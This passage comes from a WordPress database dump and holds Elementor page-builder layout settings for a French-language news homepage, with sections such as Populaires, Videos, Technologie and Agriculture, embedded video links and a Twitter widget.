\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":\"0\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"}],\"isInner\":true},{\"id\":\"6uc2i0p\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":\"44.078\",\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"10\",\"bottom\":\"0\",\"left\":\"10\",\"isLinked\":false},\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"fb4g874\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"category\":[\"2\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"78.5\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"400\",\"height\":\"510\",\"category_bg_color\":\"#c9975f\",\"category_bg_hover_color\":\"#c9975f\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":10,\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"_margin_mobile\":{\"unit\":\"px\",\"top\":\"17\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"}],\"isInner\":true},{\"id\":\"48mal4x\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":\"27.960\",\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"x20xpc5\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"category\":[\"5\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"45\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"300\",\"height\":\"250\",\"category_bg_color\":\"#ea7441\",\"category_bg_hover_color\":\"#ea7441\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom\":\"-10\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":\"0\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"},{\"id\":\"y4m8rgg\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"category\":[\"6\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"45\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"300\",\"height\":\"250\",\"category_bg_color\":\"#e5e100\",\"category_bg_hover_color\":\"#e5e100\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_color1\":\"rgba(255,255,255,0.5)\",\"post_icon_color2\":\"rgba(255,255,255,0.5)\",\"post_icon_size\":{\"unit\":\"px\",\"size\":\"15\"},\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding\":{\"unit\":\"px\",\"size\":\"15\"},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":\"0\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"c10cdqk\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"cnfm4uk\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"ofz40wf\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":17}},\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"ghxiaw4\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"p0xcklh\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"tdxggq6\",\"elType\":\"widget\",\"settings\":{\"title\":\"Populaires\",\"header_size\":\"h3\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_line_height\":{\"unit\":\"em\",\"size\":2},\"_border_border\":\"double\",\"_border_width\":{\"unit\":\"px\",\"top\":\"2\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"p72uffi\",\"elType\":\"widget\",\"settings\":{\"posts_per_page\":\"4\",\"orderby\":\"name\",\"loop_infinite_class\":\"loop-infinte-list-2\",\"width\":\"700\",\"height\":\"500\",\"title_font_size\":{\"unit\":\"px\",\"size\":19},\"use_meta\":\"\",\"use_excerpt\":\"\",\"use_button\":\"\",\"content_half_mobile\":{\"unit\":\"px\",\"size\":270},\"content_half_2_mobile\":{\"unit\":\"px\",\"size\":300}},\"elements\":[],\"widgetType\":\"magzma-post-list-2\"}],\"isInner\":false},{\"id\":\"h33oed1\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"z1s2m91\",\"elType\":\"widget\",\"settings\":{\"title\":\"Videos \",\"header_size\":\"h3\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_line_height\":{\"unit\":\"em\",\"size\":2},\"_border_border\":\"double\",\"_border_width\":{\"unit\":\"px\",\"top\":\"2\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"tb167uj\",\"elType\":\"widget\",\"settings\":{\"link\":\"https:\\/\\/www.youtube.com\\/watch?v=0jeXbexRihs\",\"vimeo_link\":\"https:\\/\\/vimeo.com\\/235215203\"},\"elements\":[],\"widgetType\":\"video\"},{\"id\":\"4pok7wn\",\"elType\":\"widget\",\"settings\":{\"link\":\"https:\\/\\/www.youtube.com\\/watch?v=c_ixEg9Gszk&feature=youtu.be\",\"vimeo_link\":\"https:\\/\\/vimeo.com\\/235215203\"},\"elements\":[],\"widgetType\":\"video\"},{\"id\":\"m45qqz3\",\"elType\":\"widget\",\"settings\":{\"link\":\"https:\\/\\/www.youtube.com\\/watch?v=wQaejvxoQ2o\",\"vimeo_link\":\"https:\\/\\/vimeo.com\\/235215203\"},\"elements\":[],\"widgetType\":\"video\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"dzzumio\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"q3q9ybg\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"tbcuyne\",\"elType\":\"widget\",\"settings\":{\"title\":\"Technologie\",\"header_size\":\"h3\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_line_height\":{\"unit\":\"em\",\"size\":2},\"_border_border\":\"double\",\"_border_width\":{\"unit\":\"px\",\"top\":\"2\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"8sxkg8r\",\"elType\":\"section\",\"settings\":{\"structure\":\"22\"},\"elements\":[{\"id\":\"yxax9tw\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":null},\"elements\":[{\"id\":\"cetl99v\",\"elType\":\"widget\",\"settings\":{\"posts_per_page\":\"3\",\"category\":[\"3\"],\"title_font_size\":{\"unit\":\"px\",\"size\":16},\"use_date\":\"\",\"use_excerpt\":\"\",\"animate\":\"\",\"animetime\":0},\"elements\":[],\"widgetType\":\"magzma-masonry-post-1\"}],\"isInner\":false},{\"id\":\"583gbbd\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"ed1i4kp\",\"elType\":\"widget\",\"settings\":{\"wp\":{\"title\":\"Suivez nous sur Twitter\",\"twitter_timeline_type\":\"username\",\"twitter_widget_username\":\"Gn_innovations\",\"twitter_widget_id\":\"\",\"twitter_widget_width\":\"\",\"twitter_widget_height\":\"400\",\"twitter_widget_tweet_limit\":\"4\",\"twitter_widget_theme\":\"light\",\"twitter_widget_link_color\":\"#3b94d9\",\"twitter_widget_border_color\":\"#f5f5f5\"}},\"elements\":[],\"widgetType\":\"wp-widget-do-etfw\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"0h88cw7\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"0d8cxde\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"gw32h4p\",\"elType\":\"widget\",\"settings\":{\"title\":\"Agriculture\",\"header_size\":\"h3\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_line_height\":{\"unit\":\"em\",\"size\":2},\"_border_border\":\"double\",\"_border_width\":{\"unit\":\"px\",\"top\":\"2\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"8hg86ic\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"i9kn0sp\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"fxvmt3h\",\"elType\":\"widget\",\"settings\":{\"posts_per_page\":\"3\",\"category\":[\"2\"],\"excerpt_value\":10},\"elements\":[],\"widgetType\":\"magzma-masonry-post-1\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"bguffns\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"15hcw7d\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"ptqj2h6\",\"elType\":\"widget\",\"settings\":{\"title\":\"Autres\",\"header_size\":\"h3\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_line_height\":{\"unit\":\"em\",\"size\":2},\"_border_border\":\"double\",\"_border_width\":{\"unit\":\"px\",\"top\":\"2\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"ub0yntr\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"tkvnvir\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[],\"isInner\":false}],\"isInner\":false}]'),(1562,522,'_elementor_version','0.4'),(1563,522,'_elementor_css','a:3:{s:4:\"time\";i:1508934810;s:5:\"fonts\";a:1:{i:0;s:5:\"Arial\";}s:6:\"status\";s:4:\"file\";}'),(1566,523,'_elementor_edit_mode','builder'),(1567,523,'_elementor_data','[{\"id\":\"cgfdli8\",\"elType\":\"section\",\"settings\":{\"section_layout\":\"\",\"content_width\":{\"unit\":\"px\",\"size\":1170},\"gap\":\"no\",\"section_background\":\"\",\"background_overlay_section\":\"\",\"section_border\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_typo\":\"\",\"section_advanced\":\"\",\"margin\":{\"unit\":\"px\",\"top\":\"20\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_section_responsive\":\"\",\"heading_visibility\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[{\"id\":\"90zub0t\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"9wd6jr7\",\"elType\":\"section\",\"settings\":{\"section_layout\":\"\",\"layout\":\"full_width\",\"gap\":\"no\",\"structure\":\"30\",\"section_sticky_element\":\"\",\"section_background\":\"\",\"background_overlay_section\":\"\",\"section_border\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_typo\":\"\",\"section_advanced\":\"\",\"_section_responsive\":\"\",\"heading_visibility\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[{\"id\":\"so55224\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":\"27.961\",\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"gvq9sbs\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"category\":[\"3\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"45\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"300\",\"height\":\"250\",\"category_bg_color\":\"#4caf50\",\"category_bg_hover_color\":\"#4caf50\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom\":\"-10\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":\"0\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"},{\"id\":\"dghaq27\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"offset\":\"0\",\"category\":[\"1\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"56\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"300\",\"height\":\"250\",\"category_bg_color\":\"#266cc9\",\"category_bg_hover_color\":\"#266cc9\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":\"0\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"}],\"isInner\":true},{\"id\":\"6uc2i0p\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":\"44.078\",\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"10\",\"bottom\":\"0\",\"left\":\"10\",\"isLinked\":false},\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"fb4g874\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"category\":[\"2\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"78.5\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"400\",\"height\":\"510\",\"category_bg_color\":\"#c9975f\",\"category_bg_hover_color\":\"#c9975f\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":10,\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"_margin_mobile\":{\"unit\":\"px\",\"top\":\"17\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"}],\"isInner\":true},{\"id\":\"48mal4x\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inlin